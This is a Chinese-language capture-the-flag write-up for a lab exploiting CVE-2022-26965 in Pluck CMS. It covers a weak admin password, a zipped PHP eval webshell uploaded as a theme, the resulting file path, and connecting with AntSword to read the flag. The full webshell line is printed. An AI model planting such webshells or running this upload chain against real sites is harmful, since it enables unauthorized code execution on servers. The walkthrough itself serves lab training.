当前位置: 首页 > ai >正文

【春秋云镜】CVE-2022-26965 靶场writeup

知识点

  • 网站的主题或者模块位置一般是可以上传文件的,不过一般为压缩包形式
  • 主题或者模块可以上github上找到和cms匹配的源码
  • 主题被解压后会放到加入到对应的文件夹中,而且还会自动执行对应的info.php文件(需要主题和cms配套才行)
  • 我这里取巧了,正常应该下载对应的主题源码进行修改上传的,而且最好采用文件写入的方式getshell,这里我是能找到文件路径的,如果路径被隐藏了的话我的方法就用不了了
  • 附上正规解法:[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE - b1nn - 博客园

解题思路

题目地址:cm - cms

点击网址得到一个网页如下:

通过F12查看源码发现有三个跳转网址,其中一个是admin登录页面

刚开始的网址:http://eci-2ze27uk2qtcn1clcp4jc.cloudeci1.ichunqiu.com/?file=cm

这很像文件包含的漏洞,已知了admin.php存在,尝试读取一下该文件,发现有waf阻止了文件读取,看来有waf,这里测不过去了

接下来测一下admin登录页面吧:pluck 4.7.15 - log in

通过点击链接进入页面,发现要输入密码

弱口令直接输入admin发现直接进入了后台

进入后台随便点了一下,发现图片管理和文件管理的位置可以上传文件,但是都被和谐了

但是主题位置是可以上传文件的

通过尝试这里不能直接上传php文件,主题一般都是压缩包的形式上传的,这里改用压缩包试一下

先写一个木马文件:1.php

 <?php @eval($_POST['cmd']);phpinfo();?>

将该文件压缩为1.zip并上传,成功后会显示安装完成

通过后台start标签下Check writable options设置,发现了可写入信息的文件夹路径

通过观察得到的文件路径格式,发现主题存在的文件路径/data/themes/

尝试读取刚才上传的文件:phpinfo()http://eci-2ze27uk2qtcn1clcp4jc.cloudeci1.ichunqiu.com//data/themes/1/1.php

成功得到phpinfo回显,说明木马上传成功了

直接利用蚁剑进行连接

在根目录下找到了flag文件,读取得到flag:flag{edadbcfd-6728-4480-98a0-0320619512a5}

10

http://www.xdnf.cn/news/9683.html

相关文章:

  • 第一章 项目总览
  • 线性代数入门:轻松理解二阶与三阶行列式的定义与理解
  • Java消息队列与安全实战:谢飞机的烧饼摊故事
  • AI编程报错 API流式传输失败解决方案
  • 如何做好一个决策:基于 Excel的决策树+敏感性分析应用
  • 在ROS2(humble)+Gazebo+rqt下,实时显示仿真无人机的相机图像
  • WPF的UI交互基石:数据绑定基础
  • UDP编程
  • 设计模式之原型模式
  • [9-1] USART串口协议 江协科技学习笔记(13个知识点)
  • pycharm debug的时候无法debug到指定的位置就停住不动了
  • Spring Boot 3.0与Java 17:企业级应用开发的新范式
  • github.com/lib/pq 数据库链接完整示例方式
  • word文档格式规范(论文格式规范、word格式、论文格式、文章格式、格式prompt)
  • 【PhysUnits】15 完善的类型整数基本结构体(basic.rs)
  • AI自动化测试框架browser use 项目测试总结
  • 2025.5.28学习日记 linux三剑客 awk
  • 阿达三国志战棋天下攻略详解最新
  • 从时间到宇宙:探索时间同步的底层奥秘与工程实践
  • AI的“空间盲症“
  • 幸运之轮系统测试报告
  • 影刀RPA-操作网站基础信息
  • java精简复习
  • 153. 寻找旋转排序数组中的最小值
  • BeeWorks:构建企业智能数字化协作中枢,实现办公与业务系统的无缝整合
  • ansible-playbook 剧本
  • Python编程7——面向对象编程2
  • 华为OD机试真题——模拟工作队列(2025A卷:200分)Java/python/JavaScript/C/C++/GO最佳实现
  • 智能体通信协议之A2A和ANP对比分析
  • 【测试报告】博客系统